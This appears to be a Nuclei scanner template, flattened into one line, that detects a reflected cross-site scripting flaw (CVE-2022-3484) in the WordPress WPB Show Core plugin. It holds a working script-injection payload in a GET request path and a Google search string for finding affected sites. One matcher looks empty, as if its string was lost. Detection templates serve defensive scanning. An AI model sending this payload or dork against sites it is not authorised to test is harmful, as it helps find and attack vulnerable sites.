id: CVE-2022-3484 info: name: WordPress WPB Show Core - Cross-Site Scripting author: theamanrawat severity: medium description: | WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. remediation: | Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability. reference: - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464 - https://nvd.nist.gov/vuln/detail/CVE-2022-3484 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3484 cwe-id: CWE-79 epss-score: 0.00078 epss-percentile: 0.32857 cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: wpb_show_core_project product: wpb_show_core framework: wordpress google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "wpb_jplayer_setting")' - 'contains(body, "")' condition: and